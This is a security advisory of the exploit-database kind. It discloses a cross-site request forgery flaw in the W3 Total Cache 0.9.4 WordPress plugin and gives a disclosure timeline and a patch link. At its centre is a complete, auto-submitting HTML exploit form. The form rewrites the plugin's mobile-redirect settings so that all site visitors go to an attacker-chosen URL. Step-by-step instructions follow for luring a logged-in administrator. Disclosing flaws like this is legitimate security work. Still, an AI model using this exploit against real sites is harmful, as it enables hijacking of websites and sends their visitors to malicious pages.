W3 Total Cache 0.9.4 Cross Site Request Forgery

`# Title: W3TotalFail: W3 Total Cache v 0.9.4 CSRF Vulnerability that Leads to Full Deface  
# Author: Mazin Ahmed  
##  
# Date of Discovering: October 6th, 2014  
# Date of Reporting to the Vendor: October 7th, 2014  
# Date of Releasing a Patch: December 9th, 2014  
##  
# Vulnerability Type: Cross-Site Request Forgery (CSRF) - CWE-352  
##  
# Vendor Homepage: https://www.w3-edge.com/  
##  
# Affected Version: 0.9.4, previous versions might be vulnerable as well.  
# Affected Software Link: https://downloads.wordpress.org/plugin/w3-total-cache.0.9.4.zip  
# Patch Link: https://downloads.wordpress.org/plugin/w3-total-cache.0.9.4.1.zip  
# Tested on: Wordpress 4.0  
# Blog Post: http://mazinahmed1.blogspot.com/2014/12/w3-total-caches-w3totalfail.html  
####  
  
###Description:  
W3 Total Cache v0.9.4 is vulnerable to a critical Cross-Site Request Forgery issue. It occurs because of the invalidation of the CSRF token "_wpnonce". This CSRF issue can be used to perform many actions, but the most significant action that has the biggest impact on users is redirecting users to malicious websites. This can be happened by using the feature of specify particular user-agents to be redirected to mobile site. By crafting an exploit that forces the victim to change the policy feature's policy to redirect every user who visit the victim's website to be redirected to a specific website that is specified by the attacker. This can be done by adding all the common keywords that is used on user-agents.  
  
###Exploit:  
------------------------------------------------------------------------------------------------------------------------------  
<html>  
<body onload="javascript:document.csrf_form.submit()">   
<form method="post" action="http://localhost/wordpress/wp-admin/admin.php?page=w3tc_mobile" name="csrf_form">   
<input type="hidden" name="mobile_groups[exploit_by_mazen160][enabled]" value="0">  
<input type="hidden" name="mobile_groups[exploit_by_mazen160][enabled]" value="1">  
<input type="hidden" name="mobile_groups[exploit_by_mazen160][theme]" value="">  
<input type="hidden" name="mobile_groups[exploit_by_mazen160][redirect]" value="https://twitter.com/mazen160">  
<input type="hidden" name="mobile_groups[exploit_by_mazen160][agents]" value="Mozilla  
Opera  
iTunes  
ELinks  
Links   
Konqueror  
Midori  
Uzbl (Webkit 1.3)  
w3m  
Lynx  
POLARIS  
nook  
BlackBerry  
LG  
MOT  
Nokia  
SEC  
Sony  
Baiduspider  
Google  
msnbot  
Email  
Gaisbot  
grub  
Download  
Wget  
curl">  
<input type="hidden" name="_wp_http_referer=" value="http://localhost/wordpress/wp-admin/admin.php?page=w3tc_mobile">  
<input type="hidden" name="w3tc_save_options" value="Save+all+settings"/>  
<input type="hidden" name="_wpnonce" value="">   
<input type="hidden" name="w3tc_note" value="config_save">   
</form>  
</body>   
</html>  
------------------------------------------------------------------------------------------------------------------------------  
  
###Vulnearble Versions:  
The issue has been confirmed on W3 Total Cache (v0.9.4). Previous versions might be vulnerable as well.  
  
###Severity: Critical   
  
###Steps to Reproduce:  
1- An attacker uploads the exploit to an accessible server   
2- The attacker sends a link of the exploit to the victim (who is using W3 Total Cache)   
3- The victim clicks on the link (while he is authenticated), and the exploit run on the victim's client-side   
4- The victim's website settings will be changed, and anyone who visits the victim's website will be redirected to the attacker's malicious website.   
  
###Remedy:  
Update W3 Total Cache plugin to the latest version.  
  
Best Regards,  
Mazin Ahmed  
https://twitter.com/mazen160  
http://mazinahmed1.blogspot.com  
`